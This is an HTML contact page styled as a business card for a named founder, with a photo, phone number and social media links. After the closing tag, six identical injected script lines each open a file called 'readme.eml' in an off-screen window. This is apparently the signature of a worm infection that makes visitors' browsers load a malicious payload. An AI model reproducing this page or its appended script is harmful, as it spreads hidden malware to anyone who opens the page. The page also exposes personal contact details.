<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>business card</title>
</head>
<style type="text/css">
    *
    {
        margin: 0;
        padding: 0;
        color: #fff;
        font-family: arial;
        overflow: hidden;
    }
    header
    {
        width: 100%;
        height: 100vh;
        background-color: #12141d;
        display: flex;
        justify-content: left;

    }
    
    .container
    
    {
        display: flex;
        width: 500px;
        height: 100vh;
        margin: auto;
        text-align: center;
        padding-top: 50px;
    }
    
    
    
    
    img 
    {
        width: 340px;
        height: 180px;
    }
    .row
    {
        display: flex;
        justify-content: center;
        padding-top: 50px;
    }
    .row .box
    {
        
        justify-content: center;
        width: 350px;
        height: 350px;
        background-color: #1e2029;
        border-radius: 10px;
        padding: 20px;
        cursor: pointer;
    }
    .row .box img
    {
        width: 200px;
        border-radius: 50%;
        margin-top: 20px;
    }
    .row .box h2
    {
        padding-top: 10px;
        font-size: 25px;
        cursor: pointer;
    }
    .row .box h4
    {
        padding-top: 10px;
        color: grey;
        font-size: 20px;
    }
    .row .box h5
    {
        padding-top: 10px;
        font-size: 16px;
        color: grey;
    }
    .row .box h6
    {
        font-size: 16px;
        color: grey;
    }
    .row .box ion-icon
    {
        margin-top: 10px;
        font-size: 20px;
        margin: 25px 0px;
        transition: 0.5s;
    }
    .row .box ion-icon:hover
    {
        color: #ff7159;
    }
</style>
<body>

    <h1 style="text-align: center;background-color: #12141d;color: #ff7159;">Contact Us </h1>
    
    <header>
        <div class="container">
            
            
            <script type="module" src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.js"></script>
            <div class="row">
                <div class="box">
                    <img src="su.jpg">
                    <h2>Surafel Ayele</h2>
                    <h4>Founder</h4>
                    <h5>+251 913 289 974</h5>
                    <h6>samansurafel17.io</h6>
                    <div class="icon">
                        <a href="https://www.facebook.com/surafel.ayele.75"><ion-icon name="logo-facebook"></ion-icon></a>
                        <ion-icon name="logo-twitter"></ion-icon>
                        <a href="https://www.instagram.com/samansura/"><ion-icon name="logo-instagram"></ion-icon></a>
                        <a href="https://www.linkedin.com/in/surafel-ayele-39b97a244/"><ion-icon name="logo-linkedin"></ion-icon></a>
                    </div>
                </div>
            </div>
        </div>
    </header>
</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>�
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>�
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>�
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>�
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>�
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>�
